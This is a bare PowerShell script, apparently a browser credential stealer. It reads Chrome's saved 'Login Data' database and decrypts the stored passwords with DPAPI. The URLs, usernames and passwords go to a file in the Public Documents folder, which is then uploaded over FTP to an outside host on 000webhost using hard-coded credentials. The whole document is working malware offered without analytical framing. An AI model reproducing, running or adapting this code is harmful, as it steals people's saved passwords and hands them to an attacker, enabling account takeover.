$User = $Env:USERPROFILE;$DbFile = "$User\AppData\Local\Google\Chrome\User Data\

1. $User = $Env:USERPROFILE;$DbFile = "$User\AppData\Local\Google\Chrome\User Data\Default\Login Data";$Stream = New-Object IO.FileStream -ArgumentList "$DbFile", 'Open', 'Read', 'ReadWrite';Add-Type -AssemblyName System.Security;$Encoding = [System.Text.Encoding]::GetEncoding(28591);$StreamReader = New-Object IO.StreamReader -ArgumentList $Stream, $Encoding;$BinaryText = $StreamReader.ReadToEnd();$StreamReader.Close();$Stream.Close();$SerialMap = [Ordered]@{0=0; 1=1; 2=2; 3=3; 4=4; 5=5; 6=6; 7=8; 8=0; 9=0};Function ToInt($ByteArray){If ($ByteArray.Length -eq 0) { Return 0 }[int32] $Int = 0;$x = 0;Do{$Int = ($Int -shl 0x8) -bor ($ByteArray[$x++])} While ($x -lt $ByteArray.Length)Return $Int;}Function ParseVarint($ByteArray, [ref]$VarintSize){[int32] $Val = 0;$x = 0;Do{$Byte = $ByteArray[$x++];$Val = ($Val -shl 0x7) -bor ($Byte -band 0x7F)} While ($x -lt 8 -and ($Byte -band 0x80))$VarintSize.Value = $x;Return $Val;}[ref]$VarintSize = 0;Function ParsePage($Page){If ($Page[0] -ne 0x0D) { Return }$NumCells = ToInt $Page[0x3..0x4];$CellAddrStart = 0x8;$CellAddrStop = $CellAddrStart + ($NumCells * 2) - 1;For ($x = $CellAddrStart; $x -le $CellAddrStop; $x += 2){$CellAddr = ToInt ($Page[$x .. ($x + 1)]);ParseCell($Page[$CellAddr .. $Page.Length]);}}Function ParseCell($Cell){$Offset = 0;$PayloadLength = ParseVarint ($Cell[$Offset .. ($Offset + 4)]) $VarintSize;$Offset += $VarintSize.Value;$RowID = ParseVarint ($Cell[$Offset .. ($Offset + 4)]) $VarintSize;$Offset += $VarintSize.Value;If (($Offset + $Payload.Length) -le $Cell.Length){ParsePayload $Cell[$Offset .. ($Offset + $PayloadLength - 1)];}}Function ParsePayload($Payload){If ($Payload.Length -eq 0) { Return }[ref]$VarintSize = 0;$HeaderLength = ParseVarint $Payload[0 .. 8] $VarintSize;$Offset = $VarintSize.Value;$FieldSeq = @();For ($y = $Offset; $y -lt $HeaderLength; $y++){$Serial = ParseVarint $Payload[$y .. ($y + 8)] $VarintSize;$y += $VarintSize.Value - 1;Switch ($Serial){{$_ -lt 0xA} { $Len = $SerialMap[$Serial]; break }{$_ -gt 0xB}{If ($Serial % 2 -eq 0) { $Len = (($Serial - 0xC) / 2) }Else { $Len = (($Serial - 0xD) / 2) }}}$FieldSeq += $Len;}$Offset = $HeaderLength;For ($f = 0; $f -lt $FieldSeq.Length; $f++){$Str = $Encoding.GetString($Payload[$Offset .. ($Offset + $FieldSeq[$f] - 1)]);If ($f -eq 0) { $URL = $Str }ElseIf ($f -eq 3) { $Username = $Str }ElseIf ($f -eq 5) { $Password = DecodePassword($Payload[$Offset .. ($Offset + $FieldSeq[$f] - 1)])}$Offset += $FieldSeq[$f];}If ($Username.Length -gt 0 -and $Password.Length -gt 0){$file = "C:\Users\Public\Documents\1.txt";$PW = New-Object System.Object;$PW | Add-Member -type NoteProperty -name URL -value $URL;$PW | Add-Member -type NoteProperty -name Username -value $Username;$PW | Add-Member -type NoteProperty -name Password -value $Password;$PW | Out-File -FilePath $file -Force -Append;Copy-Item $file $file"2"}}Function DecodePassword($Password){$P = $Encoding.GetBytes($Password);Try{$Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Password,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser);Return [System.Text.Encoding]::Default.GetString($Decrypt);}Catch { Return "" }}If ((Compare-Object $BinaryText[0x0 .. 0x5] @('S', 'Q', 'L', 'i', 't', 'e')) -ne $null){Break}$NumPages = ToInt($BinaryText[0x1C .. 0x1F]);$PageSize = ToInt($BinaryText[0x10 .. 0x11]);For ($x = 0x2; $x -lt $NumPages; $x++){$PageStart = ($x * $PageSize);ParsePage $BinaryText[$PageStart .. ($PageStart + $PageSize - 1)]}function tp{$Date = Get-Date -format d.M.yyyy;$Hour = Get-Date -format HH.mm.ss;$user = $env:USERNAME;$Entropy = Get-Random -maximum 9999999;$tof = $Date+"-"+$Hour+"-"+$user+"-"+$Entropy+".txt";$File = "C:\Users\Public\Documents\1.txt";$ftp = "ftp://madaraga:(-epiz_24312545-)@files.000webhost.com/USERS/$tof";$webclient = New-Object -TypeName System.Net.WebClient;$uri = New-Object -TypeName System.Uri -ArgumentList $ftp;$webclient.UploadFile($uri, $File);}tp